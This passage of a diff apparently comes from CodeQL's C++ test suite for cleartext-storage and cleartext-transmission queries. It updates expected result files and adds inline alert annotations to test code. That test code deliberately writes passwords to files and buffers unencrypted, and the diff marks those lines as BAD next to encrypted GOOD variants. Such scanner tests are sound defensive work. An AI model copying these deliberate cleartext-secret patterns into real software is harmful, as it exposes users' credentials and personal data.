a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextFileWrite.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextFileWrite.expected index e283cbeb57bc..067222327f28 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextFileWrite.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextFileWrite.expected 
@@ -1,3 +1,19 @@ +#select +| test2.cpp:43:2:43:8 | call to fprintf | test2.cpp:43:36:43:43 | password | test2.cpp:43:36:43:43 | password | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:43:36:43:43 | password | this source. | +| test2.cpp:44:2:44:8 | call to fprintf | test2.cpp:44:37:44:45 | thepasswd | test2.cpp:44:37:44:45 | thepasswd | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:44:37:44:45 | thepasswd | this source. | +| test2.cpp:45:2:45:8 | call to fprintf | test2.cpp:45:38:45:47 | accountkey | test2.cpp:45:38:45:47 | accountkey | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:45:38:45:47 | accountkey | this source. | +| test2.cpp:50:2:50:8 | call to fprintf | test2.cpp:50:41:50:53 | passwd_config | test2.cpp:50:41:50:53 | passwd_config | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:50:41:50:53 | passwd_config | this source. | +| test2.cpp:54:2:54:8 | call to fprintf | test2.cpp:54:41:54:52 | widepassword | test2.cpp:54:41:54:52 | widepassword | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:54:41:54:52 | widepassword | this source. | +| test2.cpp:55:2:55:8 | call to fprintf | test2.cpp:55:40:55:51 | widepassword | test2.cpp:55:40:55:51 | widepassword | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:55:40:55:51 | widepassword | this source. | +| test2.cpp:57:2:57:8 | call to fprintf | test2.cpp:57:39:57:49 | call to getPassword | test2.cpp:57:39:57:49 | call to getPassword | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:57:39:57:49 | call to getPassword | this source. | +| test2.cpp:65:3:65:9 | call to fprintf | test2.cpp:62:18:62:25 | password | test2.cpp:65:31:65:34 | cpy1 | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:62:18:62:25 | password | this source. 
| +| test2.cpp:73:3:73:9 | call to fprintf | test2.cpp:72:15:72:24 | password | test2.cpp:73:30:73:32 | *buf | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:72:17:72:24 | password | this source. | +| test2.cpp:99:3:99:9 | call to fprintf | test2.cpp:98:45:98:52 | password | test2.cpp:99:27:99:32 | *buffer | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:98:45:98:52 | password | this source. | +| test.cpp:45:3:45:7 | call to fputs | test.cpp:45:9:45:19 | thePassword | test.cpp:45:9:45:19 | thePassword | This write into file 'file' may contain unencrypted data from $@. | test.cpp:45:9:45:19 | thePassword | this source. | +| test.cpp:70:35:70:35 | call to operator<< | test.cpp:70:38:70:48 | thePassword | test.cpp:70:38:70:48 | thePassword | This write into file 'mystream' may contain unencrypted data from $@. | test.cpp:70:38:70:48 | thePassword | this source. | +| test.cpp:73:37:73:41 | call to write | test.cpp:70:38:70:48 | thePassword | test.cpp:73:43:73:53 | thePassword | This write into file 'mystream' may contain unencrypted data from $@. | test.cpp:70:38:70:48 | thePassword | this source. | +| test.cpp:73:37:73:41 | call to write | test.cpp:73:43:73:53 | thePassword | test.cpp:73:43:73:53 | thePassword | This write into file 'mystream' may contain unencrypted data from $@. | test.cpp:73:43:73:53 | thePassword | this source. | +| test.cpp:73:37:73:41 | call to write | test.cpp:73:63:73:73 | thePassword | test.cpp:73:43:73:53 | thePassword | This write into file 'mystream' may contain unencrypted data from $@. | test.cpp:73:63:73:73 | thePassword | this source. | edges | test2.cpp:62:18:62:25 | password | test2.cpp:62:18:62:25 | password | provenance | | | test2.cpp:62:18:62:25 | password | test2.cpp:65:31:65:34 | cpy1 | provenance | | 
@@ -26,19 +42,3 @@ nodes | test.cpp:73:43:73:53 | thePassword | semmle.label | thePassword | | test.cpp:73:63:73:73 | thePassword | semmle.label | thePassword | subpaths -#select -| test2.cpp:43:2:43:8 | call to fprintf | test2.cpp:43:36:43:43 | password | test2.cpp:43:36:43:43 | password | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:43:36:43:43 | password | this source. | -| test2.cpp:44:2:44:8 | call to fprintf | test2.cpp:44:37:44:45 | thepasswd | test2.cpp:44:37:44:45 | thepasswd | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:44:37:44:45 | thepasswd | this source. | -| test2.cpp:45:2:45:8 | call to fprintf | test2.cpp:45:38:45:47 | accountkey | test2.cpp:45:38:45:47 | accountkey | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:45:38:45:47 | accountkey | this source. | -| test2.cpp:50:2:50:8 | call to fprintf | test2.cpp:50:41:50:53 | passwd_config | test2.cpp:50:41:50:53 | passwd_config | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:50:41:50:53 | passwd_config | this source. | -| test2.cpp:54:2:54:8 | call to fprintf | test2.cpp:54:41:54:52 | widepassword | test2.cpp:54:41:54:52 | widepassword | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:54:41:54:52 | widepassword | this source. | -| test2.cpp:55:2:55:8 | call to fprintf | test2.cpp:55:40:55:51 | widepassword | test2.cpp:55:40:55:51 | widepassword | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:55:40:55:51 | widepassword | this source. | -| test2.cpp:57:2:57:8 | call to fprintf | test2.cpp:57:39:57:49 | call to getPassword | test2.cpp:57:39:57:49 | call to getPassword | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:57:39:57:49 | call to getPassword | this source. 
| -| test2.cpp:65:3:65:9 | call to fprintf | test2.cpp:62:18:62:25 | password | test2.cpp:65:31:65:34 | cpy1 | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:62:18:62:25 | password | this source. | -| test2.cpp:73:3:73:9 | call to fprintf | test2.cpp:72:15:72:24 | password | test2.cpp:73:30:73:32 | *buf | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:72:17:72:24 | password | this source. | -| test2.cpp:99:3:99:9 | call to fprintf | test2.cpp:98:45:98:52 | password | test2.cpp:99:27:99:32 | *buffer | This write into file 'log' may contain unencrypted data from $@. | test2.cpp:98:45:98:52 | password | this source. | -| test.cpp:45:3:45:7 | call to fputs | test.cpp:45:9:45:19 | thePassword | test.cpp:45:9:45:19 | thePassword | This write into file 'file' may contain unencrypted data from $@. | test.cpp:45:9:45:19 | thePassword | this source. | -| test.cpp:70:35:70:35 | call to operator<< | test.cpp:70:38:70:48 | thePassword | test.cpp:70:38:70:48 | thePassword | This write into file 'mystream' may contain unencrypted data from $@. | test.cpp:70:38:70:48 | thePassword | this source. | -| test.cpp:73:37:73:41 | call to write | test.cpp:70:38:70:48 | thePassword | test.cpp:73:43:73:53 | thePassword | This write into file 'mystream' may contain unencrypted data from $@. | test.cpp:70:38:70:48 | thePassword | this source. | -| test.cpp:73:37:73:41 | call to write | test.cpp:73:43:73:53 | thePassword | test.cpp:73:43:73:53 | thePassword | This write into file 'mystream' may contain unencrypted data from $@. | test.cpp:73:43:73:53 | thePassword | this source. | -| test.cpp:73:37:73:41 | call to write | test.cpp:73:63:73:73 | thePassword | test.cpp:73:43:73:53 | thePassword | This write into file 'mystream' may contain unencrypted data from $@. | test.cpp:73:63:73:73 | thePassword | this source. | 
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextFileWrite.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextFileWrite.qlref
index f047858d8808..9469736d8c77 100644
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextFileWrite.qlref
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextFileWrite.qlref
@@ -1 +1,2 @@
-Security/CWE/CWE-311/CleartextFileWrite.ql
\ No newline at end of file
+query: Security/CWE/CWE-311/CleartextFileWrite.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextTransmission.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextTransmission.expected
index fae3d76599a8..370555e6811b 100644
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextTransmission.expected
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextTransmission.expected
@@ -1,3 +1,44 @@ +#select +| test3.cpp:22:3:22:6 | call to send | test3.cpp:22:15:22:23 | password1 | test3.cpp:22:15:22:23 | password1 | This operation transmits 'password1', which may contain unencrypted sensitive data from $@. | test3.cpp:22:15:22:23 | password1 | password1 | +| test3.cpp:26:3:26:6 | call to send | test3.cpp:26:15:26:23 | password2 | test3.cpp:26:15:26:23 | password2 | This operation transmits 'password2', which may contain unencrypted sensitive data from $@. | test3.cpp:26:15:26:23 | password2 | password2 | +| test3.cpp:47:3:47:6 | call to recv | test3.cpp:47:15:47:22 | password | test3.cpp:47:15:47:22 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:47:15:47:22 | password | password | +| test3.cpp:55:3:55:6 | call to recv | test3.cpp:55:15:55:22 | password | test3.cpp:55:15:55:22 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:55:15:55:22 | password | password | +| test3.cpp:76:3:76:6 | call to send | test3.cpp:74:21:74:29 | password1 | test3.cpp:76:15:76:17 | ptr | This operation transmits 'ptr', which may contain unencrypted sensitive data from $@. | test3.cpp:74:21:74:29 | password1 | password1 | +| test3.cpp:83:3:83:6 | call to recv | test3.cpp:81:15:81:22 | password | test3.cpp:83:15:83:17 | ptr | This operation receives into 'ptr', which may put unencrypted sensitive data into $@. | test3.cpp:81:15:81:22 | password | password | +| test3.cpp:101:3:101:6 | call to read | test3.cpp:101:12:101:19 | password | test3.cpp:101:12:101:19 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:101:12:101:19 | password | password | +| test3.cpp:114:2:114:5 | call to recv | test3.cpp:134:11:134:18 | password | test3.cpp:114:14:114:19 | buffer | This operation receives into 'buffer', which may put unencrypted sensitive data into $@. 
| test3.cpp:134:11:134:18 | password | password | +| test3.cpp:140:3:140:6 | call to send | test3.cpp:138:24:138:32 | password1 | test3.cpp:140:15:140:17 | ptr | This operation transmits 'ptr', which may contain unencrypted sensitive data from $@. | test3.cpp:138:24:138:32 | password1 | password1 | +| test3.cpp:146:3:146:6 | call to send | test3.cpp:126:9:126:23 | global_password | test3.cpp:146:15:146:18 | data | This operation transmits 'data', which may contain unencrypted sensitive data from $@. | test3.cpp:126:9:126:23 | global_password | global_password | +| test3.cpp:159:3:159:6 | call to send | test3.cpp:157:19:157:26 | password | test3.cpp:159:15:159:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. | test3.cpp:157:19:157:26 | password | password | +| test3.cpp:228:2:228:5 | call to send | test3.cpp:228:26:228:33 | password | test3.cpp:228:26:228:33 | password | This operation transmits 'password', which may contain unencrypted sensitive data from $@. | test3.cpp:228:26:228:33 | password | password | +| test3.cpp:241:2:241:6 | call to fgets | test3.cpp:241:8:241:15 | password | test3.cpp:241:8:241:15 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:241:8:241:15 | password | password | +| test3.cpp:272:3:272:6 | call to send | test3.cpp:270:16:270:23 | password | test3.cpp:272:15:272:18 | *data | This operation transmits '*data', which may contain unencrypted sensitive data from $@. | test3.cpp:270:16:270:23 | password | password | +| test3.cpp:290:2:290:5 | call to send | test3.cpp:317:11:317:19 | password1 | test3.cpp:290:14:290:17 | data | This operation transmits 'data', which may contain unencrypted sensitive data from $@. 
| test3.cpp:317:11:317:19 | password1 | password1 | +| test3.cpp:295:2:295:5 | call to send | test3.cpp:322:16:322:24 | password2 | test3.cpp:295:14:295:17 | data | This operation transmits 'data', which may contain unencrypted sensitive data from $@. | test3.cpp:322:16:322:24 | password2 | password2 | +| test3.cpp:300:2:300:5 | call to send | test3.cpp:322:16:322:24 | password2 | test3.cpp:300:14:300:17 | data | This operation transmits 'data', which may contain unencrypted sensitive data from $@. | test3.cpp:322:16:322:24 | password2 | password2 | +| test3.cpp:341:4:341:7 | call to recv | test3.cpp:341:16:341:23 | password | test3.cpp:341:16:341:23 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:341:16:341:23 | password | password | +| test3.cpp:388:3:388:6 | call to recv | test3.cpp:388:15:388:22 | password | test3.cpp:388:15:388:22 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:388:15:388:22 | password | password | +| test3.cpp:414:3:414:6 | call to recv | test3.cpp:414:15:414:24 | password | test3.cpp:414:15:414:24 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:414:15:414:24 | password | password | +| test3.cpp:420:3:420:6 | call to recv | test3.cpp:420:15:420:24 | password | test3.cpp:420:15:420:24 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:420:15:420:24 | password | password | +| test3.cpp:431:2:431:6 | call to fgets | test3.cpp:431:8:431:15 | password | test3.cpp:431:8:431:15 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. 
| test3.cpp:431:8:431:15 | password | password | +| test3.cpp:507:2:507:5 | call to send | test3.cpp:507:14:507:39 | social_security_number | test3.cpp:507:14:507:39 | social_security_number | This operation transmits 'social_security_number', which may contain unencrypted sensitive data from $@. | test3.cpp:507:14:507:39 | social_security_number | social_security_number | +| test3.cpp:508:2:508:5 | call to send | test3.cpp:508:14:508:33 | socialSecurityNo | test3.cpp:508:14:508:33 | socialSecurityNo | This operation transmits 'socialSecurityNo', which may contain unencrypted sensitive data from $@. | test3.cpp:508:14:508:33 | socialSecurityNo | socialSecurityNo | +| test3.cpp:509:2:509:5 | call to send | test3.cpp:509:14:509:29 | homePostCode | test3.cpp:509:14:509:29 | homePostCode | This operation transmits 'homePostCode', which may contain unencrypted sensitive data from $@. | test3.cpp:509:14:509:29 | homePostCode | homePostCode | +| test3.cpp:510:2:510:5 | call to send | test3.cpp:510:14:510:28 | my_zip_code | test3.cpp:510:14:510:28 | my_zip_code | This operation transmits 'my_zip_code', which may contain unencrypted sensitive data from $@. | test3.cpp:510:14:510:28 | my_zip_code | my_zip_code | +| test3.cpp:511:2:511:5 | call to send | test3.cpp:511:14:511:26 | telephone | test3.cpp:511:14:511:26 | telephone | This operation transmits 'telephone', which may contain unencrypted sensitive data from $@. | test3.cpp:511:14:511:26 | telephone | telephone | +| test3.cpp:512:2:512:5 | call to send | test3.cpp:512:14:512:36 | mobile_phone_number | test3.cpp:512:14:512:36 | mobile_phone_number | This operation transmits 'mobile_phone_number', which may contain unencrypted sensitive data from $@. | test3.cpp:512:14:512:36 | mobile_phone_number | mobile_phone_number | +| test3.cpp:513:2:513:5 | call to send | test3.cpp:513:14:513:22 | email | test3.cpp:513:14:513:22 | email | This operation transmits 'email', which may contain unencrypted sensitive data from $@. 
| test3.cpp:513:14:513:22 | email | email | +| test3.cpp:514:2:514:5 | call to send | test3.cpp:514:14:514:38 | my_credit_card_number | test3.cpp:514:14:514:38 | my_credit_card_number | This operation transmits 'my_credit_card_number', which may contain unencrypted sensitive data from $@. | test3.cpp:514:14:514:38 | my_credit_card_number | my_credit_card_number | +| test3.cpp:515:2:515:5 | call to send | test3.cpp:515:14:515:35 | my_bank_account_no | test3.cpp:515:14:515:35 | my_bank_account_no | This operation transmits 'my_bank_account_no', which may contain unencrypted sensitive data from $@. | test3.cpp:515:14:515:35 | my_bank_account_no | my_bank_account_no | +| test3.cpp:516:2:516:5 | call to send | test3.cpp:516:14:516:29 | employerName | test3.cpp:516:14:516:29 | employerName | This operation transmits 'employerName', which may contain unencrypted sensitive data from $@. | test3.cpp:516:14:516:29 | employerName | employerName | +| test3.cpp:517:2:517:5 | call to send | test3.cpp:517:14:517:29 | medical_info | test3.cpp:517:14:517:29 | medical_info | This operation transmits 'medical_info', which may contain unencrypted sensitive data from $@. | test3.cpp:517:14:517:29 | medical_info | medical_info | +| test3.cpp:518:2:518:5 | call to send | test3.cpp:518:14:518:28 | license_key | test3.cpp:518:14:518:28 | license_key | This operation transmits 'license_key', which may contain unencrypted sensitive data from $@. | test3.cpp:518:14:518:28 | license_key | license_key | +| test3.cpp:527:3:527:6 | call to send | test3.cpp:526:44:526:54 | my_latitude | test3.cpp:527:15:527:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. | test3.cpp:526:44:526:54 | my_latitude | my_latitude | +| test3.cpp:533:3:533:6 | call to send | test3.cpp:532:45:532:58 | home_longitude | test3.cpp:533:15:533:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. 
| test3.cpp:532:45:532:58 | home_longitude | home_longitude | +| test3.cpp:552:3:552:6 | call to send | test3.cpp:551:47:551:58 | salaryString | test3.cpp:552:15:552:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. | test3.cpp:551:47:551:58 | salaryString | salaryString | +| test3.cpp:559:3:559:6 | call to send | test3.cpp:556:19:556:30 | salaryString | test3.cpp:559:15:559:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. | test3.cpp:556:19:556:30 | salaryString | salaryString | +| test3.cpp:572:2:572:5 | call to send | test3.cpp:571:8:571:21 | call to get_home_phone | test3.cpp:572:14:572:16 | str | This operation transmits 'str', which may contain unencrypted sensitive data from $@. | test3.cpp:571:8:571:21 | call to get_home_phone | call to get_home_phone | +| test3.cpp:578:2:578:5 | call to send | test3.cpp:577:8:577:23 | call to get_home_address | test3.cpp:578:14:578:16 | str | This operation transmits 'str', which may contain unencrypted sensitive data from $@. | test3.cpp:577:8:577:23 | call to get_home_address | call to get_home_address | edges | test3.cpp:74:21:74:29 | password1 | test3.cpp:74:21:74:29 | password1 | provenance | | | test3.cpp:74:21:74:29 | password1 | test3.cpp:76:15:76:17 | ptr | provenance | | 
@@ -140,44 +181,3 @@ nodes | test3.cpp:578:14:578:16 | str | semmle.label | str | subpaths | test3.cpp:138:24:138:32 | password1 | test3.cpp:117:28:117:33 | buffer | test3.cpp:117:13:117:14 | *id | test3.cpp:138:21:138:22 | call to id | -#select -| test3.cpp:22:3:22:6 | call to send | test3.cpp:22:15:22:23 | password1 | test3.cpp:22:15:22:23 | password1 | This operation transmits 'password1', which may contain unencrypted sensitive data from $@. | test3.cpp:22:15:22:23 | password1 | password1 | -| test3.cpp:26:3:26:6 | call to send | test3.cpp:26:15:26:23 | password2 | test3.cpp:26:15:26:23 | password2 | This operation transmits 'password2', which may contain unencrypted sensitive data from $@. | test3.cpp:26:15:26:23 | password2 | password2 | -| test3.cpp:47:3:47:6 | call to recv | test3.cpp:47:15:47:22 | password | test3.cpp:47:15:47:22 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:47:15:47:22 | password | password | -| test3.cpp:55:3:55:6 | call to recv | test3.cpp:55:15:55:22 | password | test3.cpp:55:15:55:22 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:55:15:55:22 | password | password | -| test3.cpp:76:3:76:6 | call to send | test3.cpp:74:21:74:29 | password1 | test3.cpp:76:15:76:17 | ptr | This operation transmits 'ptr', which may contain unencrypted sensitive data from $@. | test3.cpp:74:21:74:29 | password1 | password1 | -| test3.cpp:83:3:83:6 | call to recv | test3.cpp:81:15:81:22 | password | test3.cpp:83:15:83:17 | ptr | This operation receives into 'ptr', which may put unencrypted sensitive data into $@. | test3.cpp:81:15:81:22 | password | password | -| test3.cpp:101:3:101:6 | call to read | test3.cpp:101:12:101:19 | password | test3.cpp:101:12:101:19 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. 
| test3.cpp:101:12:101:19 | password | password | -| test3.cpp:114:2:114:5 | call to recv | test3.cpp:134:11:134:18 | password | test3.cpp:114:14:114:19 | buffer | This operation receives into 'buffer', which may put unencrypted sensitive data into $@. | test3.cpp:134:11:134:18 | password | password | -| test3.cpp:140:3:140:6 | call to send | test3.cpp:138:24:138:32 | password1 | test3.cpp:140:15:140:17 | ptr | This operation transmits 'ptr', which may contain unencrypted sensitive data from $@. | test3.cpp:138:24:138:32 | password1 | password1 | -| test3.cpp:146:3:146:6 | call to send | test3.cpp:126:9:126:23 | global_password | test3.cpp:146:15:146:18 | data | This operation transmits 'data', which may contain unencrypted sensitive data from $@. | test3.cpp:126:9:126:23 | global_password | global_password | -| test3.cpp:159:3:159:6 | call to send | test3.cpp:157:19:157:26 | password | test3.cpp:159:15:159:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. | test3.cpp:157:19:157:26 | password | password | -| test3.cpp:228:2:228:5 | call to send | test3.cpp:228:26:228:33 | password | test3.cpp:228:26:228:33 | password | This operation transmits 'password', which may contain unencrypted sensitive data from $@. | test3.cpp:228:26:228:33 | password | password | -| test3.cpp:241:2:241:6 | call to fgets | test3.cpp:241:8:241:15 | password | test3.cpp:241:8:241:15 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:241:8:241:15 | password | password | -| test3.cpp:272:3:272:6 | call to send | test3.cpp:270:16:270:23 | password | test3.cpp:272:15:272:18 | *data | This operation transmits '*data', which may contain unencrypted sensitive data from $@. 
| test3.cpp:270:16:270:23 | password | password | -| test3.cpp:290:2:290:5 | call to send | test3.cpp:317:11:317:19 | password1 | test3.cpp:290:14:290:17 | data | This operation transmits 'data', which may contain unencrypted sensitive data from $@. | test3.cpp:317:11:317:19 | password1 | password1 | -| test3.cpp:295:2:295:5 | call to send | test3.cpp:322:16:322:24 | password2 | test3.cpp:295:14:295:17 | data | This operation transmits 'data', which may contain unencrypted sensitive data from $@. | test3.cpp:322:16:322:24 | password2 | password2 | -| test3.cpp:300:2:300:5 | call to send | test3.cpp:322:16:322:24 | password2 | test3.cpp:300:14:300:17 | data | This operation transmits 'data', which may contain unencrypted sensitive data from $@. | test3.cpp:322:16:322:24 | password2 | password2 | -| test3.cpp:341:4:341:7 | call to recv | test3.cpp:341:16:341:23 | password | test3.cpp:341:16:341:23 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:341:16:341:23 | password | password | -| test3.cpp:388:3:388:6 | call to recv | test3.cpp:388:15:388:22 | password | test3.cpp:388:15:388:22 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:388:15:388:22 | password | password | -| test3.cpp:414:3:414:6 | call to recv | test3.cpp:414:15:414:24 | password | test3.cpp:414:15:414:24 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:414:15:414:24 | password | password | -| test3.cpp:420:3:420:6 | call to recv | test3.cpp:420:15:420:24 | password | test3.cpp:420:15:420:24 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. 
| test3.cpp:420:15:420:24 | password | password | -| test3.cpp:431:2:431:6 | call to fgets | test3.cpp:431:8:431:15 | password | test3.cpp:431:8:431:15 | password | This operation receives into 'password', which may put unencrypted sensitive data into $@. | test3.cpp:431:8:431:15 | password | password | -| test3.cpp:507:2:507:5 | call to send | test3.cpp:507:14:507:39 | social_security_number | test3.cpp:507:14:507:39 | social_security_number | This operation transmits 'social_security_number', which may contain unencrypted sensitive data from $@. | test3.cpp:507:14:507:39 | social_security_number | social_security_number | -| test3.cpp:508:2:508:5 | call to send | test3.cpp:508:14:508:33 | socialSecurityNo | test3.cpp:508:14:508:33 | socialSecurityNo | This operation transmits 'socialSecurityNo', which may contain unencrypted sensitive data from $@. | test3.cpp:508:14:508:33 | socialSecurityNo | socialSecurityNo | -| test3.cpp:509:2:509:5 | call to send | test3.cpp:509:14:509:29 | homePostCode | test3.cpp:509:14:509:29 | homePostCode | This operation transmits 'homePostCode', which may contain unencrypted sensitive data from $@. | test3.cpp:509:14:509:29 | homePostCode | homePostCode | -| test3.cpp:510:2:510:5 | call to send | test3.cpp:510:14:510:28 | my_zip_code | test3.cpp:510:14:510:28 | my_zip_code | This operation transmits 'my_zip_code', which may contain unencrypted sensitive data from $@. | test3.cpp:510:14:510:28 | my_zip_code | my_zip_code | -| test3.cpp:511:2:511:5 | call to send | test3.cpp:511:14:511:26 | telephone | test3.cpp:511:14:511:26 | telephone | This operation transmits 'telephone', which may contain unencrypted sensitive data from $@. | test3.cpp:511:14:511:26 | telephone | telephone | -| test3.cpp:512:2:512:5 | call to send | test3.cpp:512:14:512:36 | mobile_phone_number | test3.cpp:512:14:512:36 | mobile_phone_number | This operation transmits 'mobile_phone_number', which may contain unencrypted sensitive data from $@. 
| test3.cpp:512:14:512:36 | mobile_phone_number | mobile_phone_number | -| test3.cpp:513:2:513:5 | call to send | test3.cpp:513:14:513:22 | email | test3.cpp:513:14:513:22 | email | This operation transmits 'email', which may contain unencrypted sensitive data from $@. | test3.cpp:513:14:513:22 | email | email | -| test3.cpp:514:2:514:5 | call to send | test3.cpp:514:14:514:38 | my_credit_card_number | test3.cpp:514:14:514:38 | my_credit_card_number | This operation transmits 'my_credit_card_number', which may contain unencrypted sensitive data from $@. | test3.cpp:514:14:514:38 | my_credit_card_number | my_credit_card_number | -| test3.cpp:515:2:515:5 | call to send | test3.cpp:515:14:515:35 | my_bank_account_no | test3.cpp:515:14:515:35 | my_bank_account_no | This operation transmits 'my_bank_account_no', which may contain unencrypted sensitive data from $@. | test3.cpp:515:14:515:35 | my_bank_account_no | my_bank_account_no | -| test3.cpp:516:2:516:5 | call to send | test3.cpp:516:14:516:29 | employerName | test3.cpp:516:14:516:29 | employerName | This operation transmits 'employerName', which may contain unencrypted sensitive data from $@. | test3.cpp:516:14:516:29 | employerName | employerName | -| test3.cpp:517:2:517:5 | call to send | test3.cpp:517:14:517:29 | medical_info | test3.cpp:517:14:517:29 | medical_info | This operation transmits 'medical_info', which may contain unencrypted sensitive data from $@. | test3.cpp:517:14:517:29 | medical_info | medical_info | -| test3.cpp:518:2:518:5 | call to send | test3.cpp:518:14:518:28 | license_key | test3.cpp:518:14:518:28 | license_key | This operation transmits 'license_key', which may contain unencrypted sensitive data from $@. | test3.cpp:518:14:518:28 | license_key | license_key | -| test3.cpp:527:3:527:6 | call to send | test3.cpp:526:44:526:54 | my_latitude | test3.cpp:527:15:527:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. 
| test3.cpp:526:44:526:54 | my_latitude | my_latitude | -| test3.cpp:533:3:533:6 | call to send | test3.cpp:532:45:532:58 | home_longitude | test3.cpp:533:15:533:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. | test3.cpp:532:45:532:58 | home_longitude | home_longitude | -| test3.cpp:552:3:552:6 | call to send | test3.cpp:551:47:551:58 | salaryString | test3.cpp:552:15:552:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. | test3.cpp:551:47:551:58 | salaryString | salaryString | -| test3.cpp:559:3:559:6 | call to send | test3.cpp:556:19:556:30 | salaryString | test3.cpp:559:15:559:20 | *buffer | This operation transmits '*buffer', which may contain unencrypted sensitive data from $@. | test3.cpp:556:19:556:30 | salaryString | salaryString | -| test3.cpp:572:2:572:5 | call to send | test3.cpp:571:8:571:21 | call to get_home_phone | test3.cpp:572:14:572:16 | str | This operation transmits 'str', which may contain unencrypted sensitive data from $@. | test3.cpp:571:8:571:21 | call to get_home_phone | call to get_home_phone | -| test3.cpp:578:2:578:5 | call to send | test3.cpp:577:8:577:23 | call to get_home_address | test3.cpp:578:14:578:16 | str | This operation transmits 'str', which may contain unencrypted sensitive data from $@. | test3.cpp:577:8:577:23 | call to get_home_address | call to get_home_address | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextTransmission.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextTransmission.qlref index bb3fc66f1f10..5388c41bed6f 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextTransmission.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/CleartextTransmission.qlref 
@@ -1 +1,2 @@ -Security/CWE/CWE-311/CleartextTransmission.ql \ No newline at end of file +query: Security/CWE/CWE-311/CleartextTransmission.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/test.cpp index f7be37b6c9f7..e7eecffb4871 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-311/semmle/tests/test.cpp @@ -42,7 +42,7 @@ void file() { FILE *file; // BAD: write password to file in cleartext - fputs(thePassword, file); + fputs(thePassword, file); // $ Alert[cpp/cleartext-storage-file] // GOOD: encrypt first char *encrypted = encrypt(thePassword); @@ -50,12 +50,12 @@ void file() { } // test for CleartextBufferWrite -int main(int argc, char** argv) { +int main(int argc, char** argv) { // $ Source[cpp/cleartext-storage-buffer] char *input = argv[2]; char *passwd; // BAD: write password to buffer in cleartext - sprintf(passwd, "%s", input); + sprintf(passwd, "%s", input); // $ Alert[cpp/cleartext-storage-buffer] // GOOD: encrypt first sprintf(passwd, "%s", encrypt(input)); @@ -67,10 +67,10 @@ void stream() { ofstream mystream; // BAD: write password to file in cleartext - mystream << "the password is: " << thePassword; + mystream << "the password is: " << thePassword; // $ Alert[cpp/cleartext-storage-file] Source[cpp/cleartext-storage-file] // BAD: write password to file in cleartext - (mystream << "the password is: 